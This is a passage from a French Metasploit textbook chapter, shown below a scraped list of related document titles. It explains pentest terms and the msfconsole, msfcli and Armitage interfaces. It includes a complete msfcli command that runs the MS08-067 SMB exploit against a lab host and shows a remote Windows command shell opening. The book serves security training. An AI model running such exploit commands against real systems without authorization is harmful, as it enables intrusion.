Les bases de Metasploit



Documents pareils
Introduction. Pourquoi faire un pentest? Pourquoi Metasploit?

Tous les noms de produits ou marques cités dans ce livre sont des marques déposées par leurs propriétaires respectifs.

Table des matières. Avant-propos... Préface... XIII. Remerciements...

Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)

Sécurité Informatique : Metasploit

TEST D INTRUISION. Document Technique

Le scan de vulnérabilité

Formation en Sécurité Informatique

CHEF ATELIER CHEF ATELIER

SECURIDAY 2012 Pro Edition

avast! EP: Installer avast! Small Office Administration

Procédure d installation de la Sauvegarde de Windows Server

CSI351 Systèmes d exploitation Instructions pour rouler Linux avec Virtual PC dans la salle de labo 2052

SQL Server Installation Center et SQL Server Management Studio

Oracle Learning Library Tutoriel Database 12c Installer le logiciel Oracle Database et créer une Database

Installation de GFI Network Server Monitor

Installation du transfert de fichier sécurisé sur le serveur orphanet

Procédure d'installation de SQL Server Express 2008

Préconisations Techniques & Installation de Gestimum ERP

Suite logicielle ZOOM version 7.1 Guide d installation 94ZM-ZMJ1F-712

Guide d installation d AppliDis Free Edition sur Windows Serveur 2008 R2

L accès à distance du serveur

Guide d installation logicielle

SECURIDAY 2012 Pro Edition

Installer ADONIS:CE. ADONIS:Community Edition 2.0 Français. Prérequis et procédure pas à pas. BOC Information Systems 5 rue du Helder, Paris

DOCUMENT D ACCOMPAGNEMENT POUR L INSTALLATION DU LOGICIEL ESTIMACTION

Procédure d'installation de SQL Server Express 2005

Instructions d installation de MS SQL Server pour Sage 50 Classement et Gestion commerciale. Sage Suisse SA Avenue Mon-Repos Lausanne

SECURIDAY 2013 Cyber War

Managed VirusScan et renforce ses services

Mettre à jour son ordinateur vers Windows 7

Guide d'installation et de configuration de Pervasive.SQL 7 dans un environnement réseau Microsoft Windows NT

GUIDE DE L'UTILISATEUR POUR LES UNITES DE SAUVEGARDE DE SERIE HD

Manuel de l utilisateur. Soft-phone - Client VoIP 3CX Version 6.0

KN Login Order. Guide utilisateur

Installation FollowMe Q server

GlobalScape Secure FTP Server Buffer Overflow

Configurer le pare-feu de Windows XP SP2 pour WinReporter

DEPLOIEMENT MICROSOFT WINDOWS

Oracle Developer Suite 10g. Guide de l installation. Vista & Seven

Micro-ordinateurs, informations, idées, trucs et astuces utiliser le Bureau à distance

Installer Enterprise Miner 5.1 en SAS environnement Windows

TESIAL sprl. Aide pour l installation et la gestion du backup. 27 novembre 2009

GUIDE D'INSTALLATION. AXIS Camera Station

Sécurisation du réseau

Guide SQL Server 2008 pour HYSAS

SQL Data Export for PS/PSS

Directives d installation

1-Introduction 2. 2-Installation de JBPM 3. 2-JBPM en action.7

Pré-requis pour les serveurs Windows 2003, Windows 2008 R2 et Windows 2012

AOLbox. Partage de disque dur Guide d utilisation. Partage de disque dur Guide d utilisation 1

VERITAS Backup Exec TM 10.0 for Windows Servers

USB LANPORT 400. Manuel

Printer Administration Utility 4.2

Les GPO 2012 server R2 (appliqués à Terminal Serveur Edition)

VAMT 2.0. Activation de Windows 7 en collège

Système Principal (hôte) 2008 Enterprise x64

Guide d installation de MySQL

LES ACCES ODBC AVEC LE SYSTEME SAS

Les nouveautés d AppliDis Fusion 4 Service Pack 3

Création d une connexion VPN dans Windows XP pour accéder au réseau local de l UQO. Document préparé par le Service des technologies de l information

Les PowerToys pour Windows XP

Procédure d installation :

Parrot 3200LS-Color 3400LS-GPS

Installation de GFI MailEssentials

Configurer le pare-feu de Windows XP SP2/Vista pour UserLock

Direction des Systèmes d'information

Trend Enterprise Solution

Pré requis Microsoft Windows Server 2008

Guide d installation de votre Modem ADSL Wi-Fi Thomson TG585 v7

Fiche Technique. Cisco Security Agent

LaCieSync. Synchronization Software. getting started guide. Guide de démarrage. Guida introduttiva. Erste Schritte. Guía de inicio.

Installation d'un TSE (Terminal Serveur Edition)

Créer un rapport pour Reporting Services

Vue d ensemble de Windows PowerShell

WORKSHOP OBIEE 11g (version ) PRE-REQUIS:

EndNote Web. Quick Reference Card THOMSON SCIENTIFIC

(1) XDCAM Browser

Installation de SCCM 2012 (v2)

À propos de l'canon Mobile Scanning MEAP Application

Network Shutdown Module V3 Extension du Manuel Utilisateur pour architecture Virtualisée Virtual Server de Microsoft

Connexion à distance. Pour configurer les automates Beckhoff via un PC de programmation VERSION : 1.0 / PH

Mise en oeuvre d un Serveur de CD AXIS StorPoint

Table des Matières. 2 Acronis, Inc

Manuel de l utilisateur

NetBak Replicator 4.0 Manuel de l utilisateur Version 1.0

FORMATION PcVue. Mise en œuvre de WEBVUE. Journées de formation au logiciel de supervision PcVue 8.1. Lieu : Lycée Pablo Neruda Saint Martin d hères

Créer un fichier PDF/A DÉPÔT ÉLECTRONIQUE

TD/TP 1 Introduction au SDK d Android

UserLock Guide de Démarrage rapide. Version 8.5

Installation SQL Server 2005 Express sur le serveur

Pré-requis serveur d'applications AppliDis pour Microsoft Windows Server 2012


Introduction à ORACLE WAREHOUSE BUILDER Cédric du Mouza

Pour les caméras IP de modèles : QSTC201 QSTC211. Surveillance à distance via Internet Guide de démarrage

Guide d'installation NSi Mobile. Version 6.2

Récupérer les documents stockés sur l ENTG

TERRA CLOUD. Online Backup

Installation du client

(1) Network Camera

Transcription:

2 Les bases de Metasploit Sommaire Terminologie Les interfaces de Metasploit Utilitaires de Metasploit Metasploit Express et Metasploit Pro Quand vous travaillez avec le Metasploit Framework (MSF) pour la première fois, vous pouvez vous sentir noyé par ses nombreuses interfaces, options, outils, variables et modules. Dans ce chapitre, nous nous intéresserons aux bases qui vous aideront à mieux comprendre le tout. Nous passerons en revue quelques termes du pentest, puis nous verrons brièvement les différentes interfaces utilisateur disponibles. Metasploit est gratuit, open source, porté par de nombreux contributeurs du domaine de la sécurité informatique, mais deux versions commerciales sont aussi disponibles. Lors de la première utilisation de Metasploit, il est important de ne pas s attarder sur les plus récents exploits, mais plutôt de comprendre comment Metasploit fonctionne et quelles commandes vous utilisez pour rendre un exploit possible. Terminologie Dans ce livre, nous utiliserons beaucoup de termes qu il convient d abord d expliquer. La majorité des termes élémentaires qui suivent sont définis dans le contexte de Metasploit, mais sont généralement admis dans l industrie de la sécurité informatique.

8 Metasploit Exploit Un exploit est le moyen par lequel un attaquant, ou un pentester en l occurrence, profite d un défaut dans un système, une application ou un service. Un attaquant utilise un exploit pour attaquer un système de façon à lui faire produire un certain résultat que les développeurs n avaient pas envisagé. Les exploits courants sont le buffer overflow (dépassement de tampon), les vulnérabilités web (injections SQL, par exemple) et les erreurs de configuration. Payload Un payload est un code que nous voulons faire exécuter par le système et qui sera sélectionné et délivré par le framework. Par exemple, un reverse shell est un payload qui crée une connexion depuis la cible vers l attaquant, tel qu une invite de commande Windows (voir Chapitre 5), alors qu un bind shell est un payload qui "attache" une invite de commande à l écoute d un port sur la machine cible, afin que l attaquant puisse alors se connecter. Un payload peut être également quelque chose d aussi simple que quelques commandes à exécuter sur la machine cible. Shellcode Un shellcode est une suite d instructions utilisées par un payload lors de l exploitation. Il est typiquement écrit en langage assembleur. Dans la plupart des cas, une invite de commande système (un "shell") ou une invite de commande Meterpreter ("Meterpreter shell") est utilisée après qu une série d instructions a été accomplie par la machine, d où le nom. Module Un module, dans le contexte de ce livre, est une part de logiciel qui peut être utilisée par le framework Metasploit. Parfois, vous aurez besoin d utiliser un module d exploit, un composant logiciel qui porte l attaque. D autres fois, un module auxiliaire pourra être requis pour effectuer une action telle que le scan ou l énumération de systèmes. Cette modularité est ce qui rend Métasploit si puissant. Listener Un listener est un composant de Metasploit qui attend une connexion entrante de tout type. Par exemple, après que la cible a été exploitée, elle peut communiquer avec l attaquant via Internet. Le listener gère cette connexion, attendant sur la machine attaquante d être contacté par la machine exploitée.

Chapitre 2 Les bases de Metasploit 9 Les interfaces de Metasploit Metasploit offre plus d une interface à ses fonctionnalités sous-jacentes, incluant la console, la ligne de commande et l interface graphique. En plus de ces interfaces, des utilitaires fournissent un accès direct à des fonctions qui sont normalement internes au framework. Ces utilitaires peuvent être précieux pour le développement d exploits et les situations dans lesquelles vous n avez pas besoin de la flexibilité de tout le framework Metasploit. MSFconsole Msfconsole est de loin la partie la plus populaire du framework Metasploit, et ce à juste titre. C est un des outils les plus flexibles, les plus complets et les plus supportés de tout le framework Metasploit. Msfconsole fournit une interface pratique tout-en-un pour quasiment toutes les options et tous les réglages disponibles ; c est comme un magasin unique où vous trouveriez tous les exploits dont vous rêvez. Vous pouvez utiliser msfconsole pour tout faire : lancer un exploit, charger un module auxiliaire, faire une énumération, créer des listeners ou lancer une exploitation massive contre tout un réseau. Malgré l évolution constante du framework Metasploit, une série de commandes sont restées relativement stables. En maîtrisant les bases de msfconsole, vous serez capable de vous adapter à tout changement. Pour illustrer l importance de l apprentissage de msfconsole, nous l utiliserons dans pratiquement tous les chapitres du livre. Démarrer MSFconsole Pour lancer msfconsole, entrez msfconsole dans l invite de commande : root@bt:/# cd /opt/framework3/msf3/ root@bt:/opt/framework/msf3# msfconsole < metasploit > ------------ msf> \,, \ (oo) ( ) )\ -- * Pour accéder au fichier d aide de msfconsole, entrez help suivi de la commande qui vous intéresse. Dans l exemple qui suit, nous cherchons de l aide pour la commande

10 Metasploit connect, qui permet de communiquer avec un hôte. L aide présente alors une description de l outil, son usage et les différentes options à définir. msf > help connect Nous explorerons la console de plus ample façon dans les chapitres à venir. MSFcli Msfcli et msfconsole présentent deux façons radicalement différentes d accéder au framework. Alors que msfconsole présente une façon interactive d accéder à toutes les options de façon intuitive, msfcli est plus axée sur le scriptage et l interprétation des autres outils basés sur la console. Msfcli supporte aussi le lancement d exploits et de modules auxiliaires, et peut être pratique lors de l essai de modules ou du développement de nouveaux exploits pour le framework. C est un outil fantastique pour exploiter de façon unique, lorsque vous savez de quels exploits et options vous aurez besoin. Il laisse moins de place à l erreur que msfconsole mais il offre des aides basiques (dont l usage et la liste des modules) avec la commande msfcli -h, comme montré ci-après : root@bt:/opt/framework3/msf3# msfcli -h Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode] =========================================================================== Mode ---- (H)elp (S)ummary (O)ptions (A)dvanced (I)DS Evasion (P)ayloads (T)argets (AC)tions (C)heck (E)xecute Description --------------- You re looking at it, baby! Show information about this module Show available options for this module Show available advanced options for this module Show available ids evasion options for this module Show available payloads for this module Show available targets for this exploit module Show available actions for this auxiliary module Run the check routine of the selected module Execute the selected module root@bt:/opt/framework3/msf3#

Chapitre 2 Les bases de Metasploit 11 Exemple d utilisation Regardons comment il est possible d utiliser msfcli. Ne prêtez pas attention aux détails, ces exemples sont seulement censés vous montrer comment il est possible de travailler avec cette interface. Quand vous commencez l apprentissage de Metasploit, ou quand vous êtes bloqué, vous pouvez voir les options disponibles pour un module en ajoutant la lettre O à la fin de la chaîne où vous êtes bloqué. Dans l exemple suivant, nous l utilisons pour voir les options disponibles avec le module ms08_067_netapi : root@bt:/# msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 0.0.0.0 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Vous pouvez voir que le module nécessite trois options : RHOST, RPORT et SMPIPE. Maintenant, en ajoutant la lettre P, on peut vérifier les payloads disponibles : root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P [*] Please wait while we load the module tree... Compatible payloads =================== Name Description ---- ----------- generic/debug_trap Generate a debug trap in the target process generic/shell_bind_tcp Listen for a connection and spawn a command shell Dès lors que toutes les options sont configurées et qu un payload est sélectionné, nous pouvons lancer notre exploit en ajoutant E à la fin de la chaîne d arguments de msfcli : root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E [*] Please wait while we load the module tree... [*] Started bind handler [*] Automatically detecting the target...

12 Metasploit [*] Fingerprint: Windows XP Service Pack 2 - lang:english [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> C est un succès, car nous avons ouvert une invite de commande Windows sur le système distant. Armitage La composante armitage de Metasploit est une interface utilisateur entièrement graphique et interactive créée par Raphael Mudge. Cette interface est très impressionnante, riche en fonctionnalités et disponible gratuitement. Nous ne la traiterons pas en profondeur, mais il est important de mentionner quelque chose qui mérite d être exploré. Notre but est d enseigner les tenants et les aboutissants de Metasploit ; l interface graphique est géniale dès lors que vous comprenez comment le framework fonctionne. Exécution d Armitage Pour lancer Armitage, exécutez la commande armitage. Lors du démarrage, sélectionnez Start MSF, ce qui permettra à Armitage de se connecter à une instance Metasploit. root@bt:/opt/framework3/msf3# armitage Après l exécution d armitage, il suffit de cliquer sur une des fonctionnalités présentes dans le menu pour procéder à une attaque particulière ou accéder aux autres fonctionnalités. Par exemple, la Figure 2.1 montre le menu des exploits (côté client).